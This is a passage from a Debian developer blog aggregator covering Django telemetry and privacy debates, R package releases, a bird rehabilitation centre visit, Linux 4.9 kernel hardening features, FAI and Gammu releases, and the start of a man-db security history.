In other words, opt-in only, period. Jackson explained that "when we originally wrote the core of the policy documents, the DFSG [Debian Free Software Guidelines], the SC [Social Contract], and so on, no-one would have considered this behaviour acceptable", which explains why no explicit formal policy has been adopted yet in the Debian project.

One of the concerns with opt-out systems (or even prompts that default to opt-in) was well explained back then by Debian developer Bas Wijnen:

It very much resembles having to click through a license for every package you install. One of the nice things about Debian is that the user doesn't need to worry about such things: Debian makes sure things are fine.

One could argue that Debian has its own tracking systems. For example, by default, Debian will "phone home" through the APT update system (though it only reports the packages requested). However, this is currently not automated by default, although there are plans to do so soon. Furthermore, Debian members do not consider APT as tracking, because it needs to connect to the network to accomplish its primary function. Since there are multiple distributed mirrors (which the user gets to choose when installing), the risk of surveillance and tracking is also greatly reduced.

A better parallel could be drawn with Debian's popcon system, which actually tracks Debian installations, including package lists. But as Barry Warsaw pointed out in that discussion, "popcon is 'opt-in' and [...] the overwhelming majority in Debian is in favour of it in contrast to 'opt-out'". It should be noted that popcon, while opt-in, defaults to "yes" if users click through the install process. [Update: As pointed out in the comments, popcon actually defaults to "no" in Debian.] There are around 200,000 submissions at this time, which are tracked with machine-specific unique identifiers that are submitted daily. Ubuntu, which also uses the popcon software, gets around 2.8 million daily submissions, while Canonical estimates there are 40 million desktop users of Ubuntu. This would mean there is about an order of magnitude more installations than what is reported by popcon.

Policy aside, Warsaw explained that "Debian has a reputation for taking privacy issues very serious and likes to keep it".

Next steps

There are obviously disagreements within the Django project about how to handle this problem. It looks like the phone-home system may end up being implemented as a proxy system "which would allow us to strip IP addresses instead of relying on Google to anonymize them, or to anonymize them ourselves", another Django developer, Aymeric Augustin, said. Augustin also stated that the feature wouldn't "land before Django drops support for Python 2", which is currently estimated to be around 2020. It is unclear, then, how the proposal would resolve the funding issues, considering how long it would take to deploy the change and then collect the information so that it can be used to spur the funding efforts.

It also seems the system may explicitly prompt the user, with an opt-out default, instead of just splashing a warning or privacy agreement without a prompt. As Shai Berger, another Django contributor, stated, "you do not get [those] kind of numbers in community surveys". Berger also made the argument that "we trust the community to give back without being forced to do so"; furthermore:

I don't believe the increase we might get in the number of reports by making it harder to opt-out, can be worth the ill-will generated for people who might feel the reporting was "sneaked" upon them, or even those who feel they were nagged into participation rather than choosing to participate.

Other options may also include gathering metrics in pip or PyPI, which was proposed by Donald Stufft. Leidel also proposed that the system could ask to opt-in only after a few times the commands are called.

It is encouraging to see that a community can discuss such issues without heating up too much and shows great maturity for the Django project. Every free-software project may be confronted with funding and sustainability issues. Django seems to be trying to address this in a transparent way. The project is willing to engage with the whole spectrum of the community, from the top leaders to downstream distributors, including individual developers. This practice should serve as a model, if not of how to do funding or tracking, at least of how to discuss those issues productively.

Everyone seems to agree the point is not to surveil users, but improve the software. As Lars Wirzenius, a Debian developer, commented: "it's a very sad situation if free software projects have to compromise on privacy to get funded". Hopefully, Django will be able to improve its funding without compromising its principles.

Note: this article first appeared in the Linux Weekly News.

14 December, 2016 04:15PM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

anytime 0.1.2: Another bugfix

Another update, now at release 0.1.2, of anytime arrived at CRAN earlier today.

anytime is a very focused package aiming to do just one thing really well: to convert anything in integer, numeric, character, factor, ordered, ... format to either POSIXct or Date objects -- and to do so without requiring a format string.

See the anytime page, or the GitHub README.md for a few examples, or just consider the following illustration:

R> library(anytime)
R> anytime("20161107 202122")   ## all digits
[1] "2016-11-07 20:21:22 CST"
R> utctime("2016Nov07 202122")  ## UTC parse example
[1] "2016-11-07 14:21:22 CST"
R> 

Release 0.1.2 addresses a somewhat bizarre Windows-only bug reported at GitHub in #33 and at StackOverflow. Formats of the %Y-%b-%d form, i.e. 2016-Dec-12 for today, would fail on Windows, as the contiguous string was apparently being split by a routine looking for splits on spaces. Really strange.
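
For reference, the %Y-%b-%d format in question, illustrated with Python's strptime (anytime itself parses via Boost in C++; this is just to show the shape of the input):

```python
from datetime import datetime

# %Y-%b-%d: four-digit year, abbreviated month name, day-of-month --
# the contiguous form that was being mis-split on Windows.
d = datetime.strptime("2016-Dec-12", "%Y-%b-%d")
print(d.date())  # -> 2016-12-12
```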

Anyway, I switched to using more helper functions from the Boost String Algorithms library, and things are behaving now. An extra shoutout once more to Gábor Csárdi and the R Consortium for the most awesome R-Builder. I was able to test and fix on Windows during the weekend with no access to an actual Windows environment.

The NEWS file summarises the release:

Changes in anytime version 0.1.2 (2016-12-13)

  • The (internal) string processing and splitting now uses Boost algorithm functions which avoids a (bizarre) bug on Windows.

  • Test coverage was increased.

Courtesy of CRANberries, there is a comparison to the previous release. More information is on the anytime page.

For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

14 December, 2016 02:00AM

December 13, 2016

hackergotchi for Shirish Agarwal

Shirish Agarwal

Eagle Encounters, Spier, Stellenbosch

Before starting, I have to say that hindsight, as they say, is always 20/20. I was moaning about my 6/7-hour trip a few blog posts back, but have now come to know about the 17.5-hour flights (17.5 x 800 km/hr = 14,000 km) happening around me.

Seeing those flights, I would say I was whining about nothing. I can't even imagine how people feel on them. Six hours was too much in the tin can, though thankfully I was in an aisle seat. In 14 hours most people would probably give in to air rage.

I just saw an excellent article on the subject. I also came to know that seat selection and food on long-haul flights are a luxury, which changes the equation quite a bit as well. On those counts, it seems Qatar Airways treated me quite well, as I was able to use both options.

Disclaimer: my knowledge of birds is almost non-existent, so feel free to correct me if I go wrong anywhere.

Coming back to earth, literally 😉, I will have to share a bit about South Africa, as that is part and parcel of what I'm going to share next. Also, many of the pictures in this particular blog post belong to KK, who has shared them with me with permission to share them with the rest of the world.

From my first couple of days in South Africa, as well as from what little South African history I had read before travelling, I knew that Europeans, specifically the Dutch, had ruled South Africa for many years.

What was shared with me in the first day or two was that 'Afrikaans' is mostly spoken by Europeans still living in South Africa, and by some of the coloured people as well. This tied in with the literature I had already read.

The Wikipedia page shares which language is spoken by whom and how the demographics play out if people are interested to know that.

One word, or part of a word, for places that we came to know is 'bosch', which is used in many place names. 'Bosch' means wood or forest. After this we recognized many places named 'somethingbosch', which signified to us that the area is or was a forest.

On the second/third day, Chirayu (pictured extreme left) shared the idea of going to Eagle Encounters. Also pictured are yours truly, some of the people from GSoC, KK in the middle, and on the right the driver, Leonard, who took us to Eagle Encounters.

Update: I was informed that it was a joint plan between Chirayu and KK. They had also planned some other options, which later fell by the wayside.

The whole gang/group, along with Leonard, coming back from Eagle Encounters

It was supposed to be somewhat near (Spier, Stellenbosch). While I was not able to figure out where 'Eagle Encounters' is on OpenStreetMap, somebody named Firefishy added Spier to OSM a few years back. So thank you, Firefishy; at least I can pinpoint a nearby place.

I didn’t see/know/try to figure out about the place as Chirayu said it’s a ‘zoo’. I wasn’t enthusiastic as much as I had been depressed by most zoos in India, while you do have national reserves/Parks in India where you see animals in their full glory.

I have been lucky enough to have seen Tadoba and Ranthambore National Parks and to have spent some quality time (about a week) getting some idea of what happens in forests and among people living in the buffer zones, but those stories are for a different day altogether.

I do hope to be part of the Ranthambore experience again sometime in the future; it really is a beautiful place for flora and fauna, and, fortunately or unfortunately, this is the best time apart from spring, as you have the play of mist/fog and animals. North India at this time of the year is something to be experienced.

I wasn’t much enthused as “zoos” in India are claustrophobic for animals and people both. There are small cages and you see and smell the shit/piss of the animals, generally not a good feeling.

Chirayu also shared with us the possibility of riding Segways and a range of bicycles, which relieved me: in case we didn't enjoy the 'zoo', we would at least enjoy the Segways and have a good time (although that would involve expenses separate from those at Eagle Encounters).

My whole education about what a zoo could be was turned around at Eagle Encounters as it seems to be somewhere between a zoo and what I know as national parks where animals roam free.

We purchased the tickets and went in, the first event/happening was ‘Eagle Encounters’ itself.

One of the families at Eagle Encounters handling a snowy owl

Our introduction to the place was led by two lovely volunteer-trainers who were in charge of all the birds at Eagle Encounters. It started with every one of us who came for the 'Eagle Encounters' show wearing a glove and holding one of a pair of snowy owls on it. The picture is of a family who was part of our show.

Before my turn came, I was a little apprehensive about holding an owl, period. To my surprise, they were so soft and easy-going that I could hardly feel the weight on my hand.

The volunteer-trainers were constantly feeding them bits of earthworm (I didn't ask, just guessing), and we were all happy as they, along with the visitors, played and interacted with the birds while sharing with us the life cycle of the snowy owl. Only then did I understand why, in the Harry Potter universe, the owl plays such an important part. They seem to be nice, curious, easy-going, proud creatures, which fits perfectly in the HP universe.

In hindsight, I should have videoed the whole experience, as the volunteer-trainers showed a battery of owls, eagles, vultures, hawks: different birds of prey, what have you. I have to confess my knowledge of birds is, and was, non-existent.

Vulture at the Eagle Encounters show

A vulture, one of the larger birds we saw at the Eagle Encounters show. Some of these birds can be dangerous, especially in the wild.

The other trainer showing off a Black Eagle at Eagle Encounters

That is the other volunteer-trainer showing off the birds. I especially liked the t-shirt she was wearing. The shop at Eagle Encounters had a whole lot of them, but they were a bit expensive and just not my size 😦

Tidbit: just a few years ago, it was a shock to me to realize that what most people in the country commonly know as a parrot is actually a parakeet. As can be seen in the linked article, they are widely distributed in India.

When I was young, I used to see rose-ringed parakeets around quite a bit, but nowadays, probably due to pollution and other factors, they are noticeably fewer. They are popular as pets in India; I don't know what Pollito would think about that, but I don't think he would approve.

Trainer showing off a Hawk at Eagle Encounters

As I cannot differentiate between hawks, vultures, eagles, etc., I will safely say 'a bird of prey' is what he was holding. This photo was taken after the event was over, when we were all curious to know about the volunteer-trainers, their day jobs, and what it meant for them to be taking care of these birds.

Update: KK has shared with me what those specific birds are called, so in case the names or species are wrong, please take it up with her and not me.

While I don’t remember the name of the trainer/volunteer, among other things it was shared that the volunteers/trainers aren’t paid enough and they never have enough funds to take care of all the birds who come to them.

Trainer showing Hawk and background chart

Where the picture was shot (both this one and the earlier one) was a sort of open office. If you look closely, you will see the names of the birds; for instance, people who love LOTR will easily spot 'Gandalf'. The board lists how much food (probably in grams) each bird ate in a day and a week.

While it was not shared, I'm sure there is a lot of paperwork and many studies involved in getting the birds as well as possible. From a computer-science perspective, there seemed to be a lot of potential for avian and big-data professionals to do computer modelling and analysis, giving more insight into the rehabilitation efforts so the process could become more fine-tuned, efficient and perhaps more economical.

Hawk on stand

This is how we saw the majority of the birds. Most of them had a metal/plastic tether tied to small artificial branches like the one above.

I forgot to share a very important point. Eagle Encounters is not a zoo but a Rehabilitation Centre.

While the cynic/skeptic part of me tried not to dwell on the before-and-after pictures of the birds brought to the rehabilitation centre, the caring part was moved to see most of the birds being treated with love and affection. From our conversations with the volunteer-trainers, it emerged that every week they have to turn away lots of birds due to space constraints. They keep only the most serious, life-threatening cases for which they can provide care in a sustainable way.

Some of the birds were in cages, which were large and airy. I wouldn't say clean, as from what little I read before (and later), birds shit enormously, so cleaning cages is quite an effort. On most of the cages, and near the artificial branches, there were placards of people sponsoring a bird or two to look after them.

From what was shared, many of the birds that came had been abused in many ways; some had had their bones crushed, among other cruelties. Having been wonderfully surprised to see birds come so close to me and most of my friends, I felt rage at those who had treated the birds in such evil ways.

What was shared with us is that while they try to heal the birds as much as possible, it is always uncertain how well the birds would survive on their own in nature; hence many of these birds go to a sponsor or some other place when they are well.

The Secretary birds: cage, sponsors, adopted

If you look at the picture closely (maybe at the higher-resolution photo in the gallery), you will see that both birds have been adopted, by two different couples. The birds, as the name tag shows, are called 'Secretaries'.

The Secretaries make a distinctive sound similar to that of old typewriters. Just as woodpeckers make Morse-code-like noises when pecking trees with their beaks, the Secretaries made something similar to the clacking of keys on old Remington typewriters.

One of the birds in the cage

This is one of the birds in one of the few cages; you can also see it in the higher-resolution version of the earlier picture, the one with the 'Secretaries'. As can also be seen in the picture, there is woodworking happening, and they are trying to expand the rehabilitation centre.

All in all, an excursion which was supposed to take just an hour extended to some 3-odd hours. KK shot well over 1,000 pictures, enough to fill some 30-odd traditional photo albums, while trying to converse in Malayalam with some of the birds.

Jaminy (KK's partner-in-crime) used her selfie stick to desired effect, taking pictures with most of the birds as one does with celebrities.

I had also taken some, but most of them were over-exposed, as I was new to mobile photography at that time. I still am, but mostly it works.

Lake with Barn Owls near Eagle Encounters

That is the lake we discovered after coming back from Eagle Encounters. We had a good time.

Lastly, a virtual prize distribution ceremony –

a. Chirayu and KK – A platinum trophy for actually thinking and pitching the place in the first place.

b. Shirish and Deven Bansod – Metal cups for not taking more than 10 minutes to freshen up and be back after hearing the plan to go to Eagle Encounters.

c. All the girls/women – Spoons for actually making it to the day. All of them took quite some time to freshen up; otherwise it might have been possible to also experience the Segways, who knows.

All in all, an enjoyable day spent being part of ‘Eagle Encounters’.


Filed under: Miscellaneous Tagged: #Birds of Prey, #Debconf16, #Eagle Encounters, #Rehabilitation, #South African History, #Stellenbosch

13 December, 2016 11:15PM by shirishag75

hackergotchi for Martin Pitt

Martin Pitt

The alphabet and pitti end here: Last day at Canonical

I’ve had the pleasure of working on Ubuntu for 12½ years now, and during that time used up an entire Latin alphabet of release names! (Well, A and C are still free, but we used H and W twice, so on average.. ☺ ) This has for sure been the most exciting time in my life with tons of good memories! Very few highlights:

  • Getting some spam mail from a South African multi-millionaire about a GREAT OPPORTUNITY
  • Joining #warthogs (my first IRC experience) and collecting my first bounties for “derooting” Debian (i. e. drop privileges from root daemons and suid binaries)
  • Getting invited to Oxford to meet a bunch of people for which I had absolutely zero proof of existence, and tossing myself into debts for buying a laptop for that occasion
  • Once being there, looking into my fellows’ stern and serious faces and being amazed by their professionalism:
  • The excitement and hype around going public with Warty Warthogs Beta
  • Meeting lots of good folks at many UDSes, with great ideas and lots of enthusiasm, and sometimes “Bags of Death”. Group photo from Ubuntu Down Under:
  • Organizing UDSes without Launchpad or other electronic help:
     
  • Playing “Wish you were Here” with Bill, Tony, Jono, and the other All Stars
  • Seeing bug #1 getting closed, and watching the transformation of Microsoft from being TEH EVIL of the FOSS world to our business partner
  • Getting to know lots of great places around the world. My favourite: luring a few colleagues for a “short walk through San Francisco” but ruining their feet with a 9 hour hike throughout the city, Golden Gate Park and dipping toes into the Pacific.
  • Seeing Ubuntu grow from that crazy idea into one of the main pillars of the free software world
  • ITZ GTK BUG!
  • Getting really excited when Milbank and the Canonical office appeared in the Harry Potter movie
  • Moving between and getting to know many different teams from the inside (security, desktop, OEM, QA, CI, Foundations, Release, SRU, Tech Board, …) to appreciate and understand the value of different perspectives
  • Breaking burning wood boards, making great and silly videos, and team games in the forest (that was La Mola) at various All Hands

But all good things must come to an end — after tossing and turning this idea for a long time, I will leave Canonical at the end of the year. One major reason for me leaving is that after that long time I am simply in need of a “reboot”: I’ve piled up so many little and large things that I can hardly spend one day on developing something new without hopelessly falling behind in responding to pings about fixing low-level stuff, debugging weird things, handholding infrastructure, explaining how things (should) work, doing urgent archive/SRU/maintenance tasks, and whatnot (“it’s related to boot, it probably has systemd in the name, let’s hand it to pitti”). I’ve repeatedly tried to rid myself of some of those or at least find someone else to share the load with, but it’s too sticky :-/ So I spent the last few weeks finishing some loose ends and handing over some of my main responsibilities.

Today is my last day at work, which I spend mostly on unsubscribing from package bugs, leaving Launchpad teams, and catching up with emails and bugs, i. e. “clean up my office desk”. From tomorrow on I’ll enjoy some longer EOY holidays, before starting my new job in January.

I was offered the chance to work on Cockpit, on the product itself and its ties into the Linux plumbing stack (storaged/udisks, systemd, and the like). So from next year on I’ll change my Hat to become Red instead of orange. I’m curious to see for myself what the other side of the fence looks like!

This won’t be a personal good-bye. I will continue to see a lot of you Ubuntu folks on FOSDEMs, debconfs, Plumber’s, or on IRC. But certainly much less often, and that’s the part that I regret most — many of you have become close friends, and Canonical feels much more like a family than a company. So, thanks to all of you for being on that journey with me, and of course a special and big Thank You to Mark Shuttleworth for coming up with this great Ubuntu vision and making all of this possible!

13 December, 2016 11:38AM by pitti

hackergotchi for Ben Hutchings

Ben Hutchings

Debian LTS work, November 2016

I was assigned 11 hours of work by Freexian's Debian LTS initiative. I worked 9 hours and will carry over the remaining 2 hours.

In my role as Linux 3.2 stable maintainer, I made a 3.2.84 release with a large number of backported fixes. I then rebased wheezy's linux package on this and made some additional changes to maintain the kernel module ABI. This will probably be released some time in December or January, depending on what security issues turn up.

13 December, 2016 05:10AM

December 12, 2016

hackergotchi for Jonathan McDowell

Jonathan McDowell

No longer a student. Again.

99 Problems

(image courtesy of XKCD)

Last week I graduated with a Masters in Legal Science (now taught as an MLaw) from Queen’s University Belfast. I’m pleased to have achieved a Distinction, as well as an award for Outstanding Achievement in the Dissertation (which was on the infringement of privacy by private organisations due to state-mandated surveillance and retention laws - pretty topical given the unfortunate introduction of the Investigatory Powers Act 2016). However, as previously stated, I had made the decision that I was happier building things, and wanted to return to the world of technology. I talked to a number of interesting companies, got to various stages in the hiring process with each of them, and happily accepted a role with Titan IC Systems which started at the beginning of September.

Titan have produced a hardware-accelerated regular expression processor (hence the XKCD reference); the RXP in its FPGA variant (what I get to play with) can handle pattern matching against 40Gb/s of traffic. Which is kinda interesting, as it lends itself to a whole range of applications from network scanning to data mining to, well, anything where you want to sift through a large amount of data checking against a large number of rules. However it’s brand new technology for me to get up to speed with (plus getting back into a regular working pattern rather than academentia), and the combination of that and spending most of the summer post DebConf wrapping up the dissertation has meant I haven’t had as much time to devote to other things as I’d have liked. However I’ve a few side projects at various stages of completion and will try to manage more regular updates.

12 December, 2016 10:27PM

hackergotchi for Kees Cook

Kees Cook

security things in Linux v4.9

Previously: v4.8.

Here are a bunch of security things I’m excited about in the newly released Linux v4.9:

Latent Entropy GCC plugin

Building on her earlier work to bring GCC plugin support to the Linux kernel, Emese Revfy ported PaX’s Latent Entropy GCC plugin to upstream. This plugin is significantly more complex than the others that have already been ported, and performs extensive instrumentation of functions marked with __latent_entropy. These functions have their branches and loops adjusted to mix random values (selected at build time) into a global entropy gathering variable. Since the branch and loop ordering is very specific to boot conditions, CPU quirks, memory layout, etc, this provides some additional uncertainty to the kernel’s entropy pool. Since the entropy actually gathered is hard to measure, no entropy is “credited”, but rather used to mix the existing pool further. Probably the best place to enable this plugin is on small devices without other strong sources of entropy.
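The mixing idea can be modelled in a few lines of Python (a conceptual sketch only; the real plugin emits C instrumentation chosen by GCC at build time, and the constants and mixing operations here are made up):

```python
MASK64 = (1 << 64) - 1

# Stand-ins for the random constants GCC would select at build time
# (these values are illustrative, not the plugin's).
BUILD_CONSTANTS = [0x9E3779B97F4A7C15, 0xC2B2AE3D27D4EB4F, 0x165667B19E3779F9]

def mix(pool, const):
    # XOR the constant in, then rotate -- a stand-in for whatever
    # mixing operations the plugin actually chooses per call site.
    pool ^= const
    return ((pool << 7) | (pool >> 57)) & MASK64

def instrumented_boot_step(items, pool=0):
    # Models a function marked __latent_entropy: every loop iteration
    # and every branch taken mixes a different build-time constant, so
    # the final pool value depends on the exact control flow at boot.
    for i, item in enumerate(items):
        pool = mix(pool, BUILD_CONSTANTS[i % len(BUILD_CONSTANTS)])
        if item % 2:  # branch taken -> extra mixing
            pool = mix(pool, BUILD_CONSTANTS[0])
    return pool
```

Two runs that take different control-flow paths end with different pool values, which is the whole point: the entropy comes from which branches and loops actually executed, not from the constants themselves.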

vmapped kernel stack and thread_info relocation on x86

Normally, kernel stacks are mapped together in memory. This meant that attackers could use forms of stack exhaustion (or stack buffer overflows) to reach past the end of a stack and start writing over another process’s stack. This is bad, and one way to stop it is to provide guard pages between stacks, which is provided by vmalloced memory. Andy Lutomirski did a bunch of work to move to vmapped kernel stack via CONFIG_VMAP_STACK on x86_64. Now when writing past the end of the stack, the kernel will immediately fault instead of just continuing to blindly write.

Related to this, the kernel was storing thread_info (which contained sensitive values like addr_limit) at the bottom of the kernel stack, which was an easy target for attackers to hit. Between a combination of explicitly moving targets out of thread_info, removing needless fields, and entirely moving thread_info off the stack, Andy Lutomirski and Linus Torvalds created CONFIG_THREAD_INFO_IN_TASK for x86.

CONFIG_DEBUG_RODATA mandatory on arm64

As recently done for x86, Mark Rutland made CONFIG_DEBUG_RODATA mandatory on arm64. This feature controls whether the kernel enforces proper memory protections on its own memory regions (code memory is executable and read-only, read-only data is actually read-only and non-executable, and writable data is non-executable). This protection is a fundamental security primitive for kernel self-protection, so there’s no reason to make the protection optional.

random_page() cleanup

Cleaning up the code around the userspace ASLR implementations makes them easier to reason about. This has been happening for things like the recent consolidation on arch_mmap_rnd() for ET_DYN and during the addition of the entropy sysctl. Both uncovered some awkward uses of get_random_int() (or similar) in and around arch_mmap_rnd() (which is used for mmap (and therefore shared library) and PIE ASLR), as well as in randomize_stack_top() (which is used for stack ASLR). Jason Cooper cleaned things up further by doing away with randomize_range() entirely and replacing it with the saner random_page(), making the per-architecture arch_randomize_brk() (responsible for brk ASLR) much easier to understand.
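The essential property of such a helper is simple enough to sketch: pick a random page number, then shift it up into a page-aligned byte offset. This is hypothetical Python illustrating the idea, not the kernel's actual code (which is C, and architecture-specific):

```python
import secrets

PAGE_SHIFT = 12              # 4 KiB pages, as on x86
PAGE_SIZE = 1 << PAGE_SHIFT

def random_page(bits):
    # Choose a random page *number* with `bits` bits of entropy, then
    # shift it into a byte offset -- the result is always page-aligned,
    # which is what an ASLR displacement must be.
    return secrets.randbits(bits) << PAGE_SHIFT

def randomize_brk(brk, bits=13):
    # Illustrative brk-ASLR sketch (names are mine, not the kernel
    # API): displace the program break by a random page-aligned amount.
    return brk + random_page(bits)
```

Centralising the "random page number, shifted" step is what removes the awkward per-architecture arithmetic that randomize_range() callers used to repeat.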

That’s it for now! Let me know if there are other fun things to call attention to in v4.9.

© 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

12 December, 2016 07:05PM by kees

hackergotchi for Michal Čihař

Michal Čihař

Gammu 1.38.0

Today Gammu 1.38.0 has been released. The changes from the last two testing releases have been stabilized, and this is the outcome. You can expect changes in the API and SMSD tables, as well as some additional features.

Also, this is the first stable release after several years that comes with Windows binaries. These are built using AppVeyor and will help bring Windows users back to the latest versions.

Full list of changes and new features can be found on Gammu 1.38.0 release page.

Would you like to see more features in Gammu? You can support further Gammu development at Bountysource salt or by direct donation.

Filed under: Debian English Gammu | 0 comments

12 December, 2016 05:00PM

hackergotchi for Thomas Lange

Thomas Lange

Two months full of FAI work

The last months were filled with a lot of FAI work. After the release that supports the creation of disk images, I attended the Debian cloud sprint in Seattle. During the sprint, we've looked at some image creation tools and I gave a short demo of the new fai-diskimage command. We've decided to evaluate FAI for creating official Debian cloud images!

We've created the FAI configuration for GCE images during the sprint, and Sam has now moved his own setup from vmdebootstrap to FAI; see his report.

A few weeks ago, I gave an FAI training in Cologne for a customer. The participants really loved FAI, and they will use it for CentOS, OpenSUSE, Debian and Ubuntu because FAI perfectly fits their needs. Giving this training was a pleasure for me because the participants were really good and they've learned everything about FAI.

Later, I wrote some new code for detecting unknown package names for the install_packages command, which is needed because aptitude does not handle this any more.

I've finally released the new version FAI 5.3.2 and also created new ISO images which are now available at http://fai-project.org/fai-cd/.

FAI cloud

12 December, 2016 03:54PM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppCCTZ 0.1.0

A new version 0.1.0 of RcppCCTZ arrived on CRAN this morning. It brings a number of new or updated things, starting with new upstream code from CCTZ as well as a few new utility functions.

CCTZ is a C++ library for translating between absolute and civil times using the rules of a time zone. In fact, it is two libraries: one for dealing with civil time (human-readable dates and times), and one for converting between absolute and civil times via time zones. It requires only a proper C++11 compiler and the standard IANA time zone database which standard Unix, Linux, OS X, ... computers tend to have in /usr/share/zoneinfo. RcppCCTZ connects this library to R by relying on Rcpp.

A nice example is the helloMoon() function (based on an introductory example in the CCTZ documentation) showing the time when Neil Armstrong took a small step, relative to local time in New York and Sydney:

R> library(RcppCCTZ)
R> helloMoon(verbose=TRUE)
1969-07-20 22:56:00 -0400
1969-07-21 12:56:00 +1000
                   New_York                      Sydney 
"1969-07-20 22:56:00 -0400" "1969-07-21 12:56:00 +1000" 
R> 
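The same absolute/civil split exists in Python's standard library; as a cross-check of the output above, here is a rough analogue of helloMoon() using zoneinfo rather than RcppCCTZ (assuming the system tzdata is installed):

```python
from datetime import datetime, timezone
from zoneinfo import ZoneInfo

# The single absolute instant (Armstrong's first step), expressed in UTC.
moon_walk = datetime(1969, 7, 21, 2, 56, tzinfo=timezone.utc)

def civil(tz_name):
    # Convert the one absolute time into a civil time in the given zone.
    return moon_walk.astimezone(ZoneInfo(tz_name)).strftime(
        "%Y-%m-%d %H:%M:%S %z")

for tz_name in ("America/New_York", "Australia/Sydney"):
    print(tz_name, civil(tz_name))
```

On a system with historical tzdata this prints 1969-07-20 22:56:00 -0400 for New York and 1969-07-21 12:56:00 +1000 for Sydney, matching the R output above.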

The new formatting and parsing functions are illustrated below with default arguments for format strings and timezones. All this can be customized as usual.

R> example(formatDatetime)

frmtDtR> now <- Sys.time()

frmtDtR> formatDatetime(now)            # current (UTC) time, in full precision RFC3339
[1] "2016-12-12T13:21:03.866711+00:00"

frmtDtR> formatDatetime(now, tgttzstr="America/New_York")  # same but in NY
[1] "2016-12-12T08:21:03.866711-05:00"

frmtDtR> formatDatetime(now + 0:4)     # vectorised
[1] "2016-12-12T13:21:03.866711+00:00" "2016-12-12T13:21:04.866711+00:00" "2016-12-12T13:21:05.866711+00:00"
[4] "2016-12-12T13:21:06.866711+00:00" "2016-12-12T13:21:07.866711+00:00"
R> example(parseDatetime)

prsDttR> ds <- getOption("digits.secs")

prsDttR> options(digits.secs=6) # max value

prsDttR> parseDatetime("2016-12-07 10:11:12",        "%Y-%m-%d %H:%M:%S");   # full seconds
[1] "2016-12-07 04:11:12 CST"

prsDttR> parseDatetime("2016-12-07 10:11:12.123456", "%Y-%m-%d %H:%M:%E*S"); # fractional seconds
[1] "2016-12-07 04:11:12.123456 CST"

prsDttR> parseDatetime("2016-12-07T10:11:12.123456-00:00")  ## default RFC3339 format
[1] "2016-12-07 04:11:12.123456 CST"

prsDttR> now <- trunc(Sys.time())

prsDttR> parseDatetime(formatDatetime(now + 0:4))               # vectorised
[1] "2016-12-12 07:21:17 CST" "2016-12-12 07:21:18 CST" "2016-12-12 07:21:19 CST"
[4] "2016-12-12 07:21:20 CST" "2016-12-12 07:21:21 CST"

prsDttR> options(digits.secs=ds)
R>

Changes in this version are summarized here:

Changes in version 0.1.0 (2016-12-11)

  • Synchronized with CCTZ upstream.

  • New parsing and formatting helpers for Datetime vectors.

  • New parsing and formatting helpers for (two) double vectors representing full std::chrono nanosecond resolutions.

  • Updated documentation and examples.

We also have a diff to the previous version thanks to CRANberries. More details are at the RcppCCTZ page; code, issue tickets etc at the GitHub repository.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

12 December, 2016 12:27PM

hackergotchi for Michal Čihař

Michal Čihař

New location for Weblate

Today, Weblate got a new home. The difference is not that big - it has been moved from my personal GitHub account to the WeblateOrg organization.

The main motivation is to have all Weblate-related repositories in one location (all the others, including wlc, Docker and the website, are already there). The move will also make the project easier to manage in the future, as an organization provides more management options on GitHub than separate personal repositories.

In case you have cloned the git repository, please update

git remote set-url origin https://github.com/WeblateOrg/weblate.git

Of course all issue tracker locations have changed as well (I believe the redirect on GitHub will stay as long as I don't fork the repository, so expect it to work for at least a month). See the GitHub documentation on repository moving.

I'm sorry for all the trouble, but I think this is a really necessary move.

Filed under: Debian English SUSE Weblate | 0 comments

12 December, 2016 12:00PM

hackergotchi for Paul Tagliamonte

Paul Tagliamonte

DNSync MAC Addresses

I’ve been hacking on a project on and off for my LAN called DNSync. This will take a DNSMasq leases file and sync it to Amazon Route 53.

I’ve added a new feature, which will create A records for each MAC address on the LAN.

Since DNSync won’t touch CNAME records, I use CNAME records (manually) to point to the auto-synced A records for services on my LAN (such as my Projector, etc).

Since it’s easy for two machines to have the same name, I’ve decided to add A records for each MAC as well as their client name. They take the form of something like ab-cd-ef-ab-cd-ef.by-mac.paultag.house., which is harder to accidentally collide.
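The name construction is straightforward; a hypothetical helper mirroring the scheme described above (the zone name is the post's own example, but this code is mine, not DNSync's):

```python
def by_mac_hostname(mac, zone="by-mac.paultag.house."):
    # Lowercase the MAC and swap ':' separators for '-' so it forms a
    # valid DNS label, then append the zone.
    return mac.lower().replace(":", "-") + "." + zone
```

For example, by_mac_hostname("AB:CD:EF:AB:CD:EF") yields ab-cd-ef-ab-cd-ef.by-mac.paultag.house., which is stable across renames of the client and unlikely to collide.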

12 December, 2016 03:30AM

December 11, 2016

hackergotchi for Colin Watson

Colin Watson

The sad tale of CVE-2015-1336

Today I released man-db 2.7.6 (announcement, NEWS, git log), and uploaded it to Debian unstable. The major change in this release was a set of fixes for two security vulnerabilities, one of which affected all man-db installations since 2.3.12 (or 2.3.10-66 in Debian), and the other of which was specific to Debian and its derivatives.

It’s probably obvious from the dates here that this has not been my finest hour in terms of responding to security issues in a timely fashion, and I apologise for that. Some of this is just the usual life reasons, which I shan’t bore you by reciting, but some of it has been that fixing this properly in man-db was genuinely rather complicated and delicate. Since I’ve previously advocated man-db over some of its competitors on the basis of a better security posture, I think it behooves me to write up a longer description.

I took over maintaining man-db over fifteen years ago in slightly unexpected circumstances (I got annoyed with its bug list and made a couple of non-maintainer uploads, and then the previous maintainer died, so I ended up taking over both in Debian and upstream). I was a fairly new developer at the time, and there weren’t a lot of people I could ask questions of, but I did my best to recover as much of the history as I could and learn from it. One thing that became clear very quickly, both from my own inspection and from the bug list, was that most of the code had been written in a rather more innocent time. It was absolutely riddled with dangerous uses of the shell, poor temporary file handling, buffer overruns, and various common-or-garden deficiencies of that kind. I spent several years reworking large swathes of the codebase to be more robust against those kinds of bugs by design, and for example libpipeline came out of that effort.

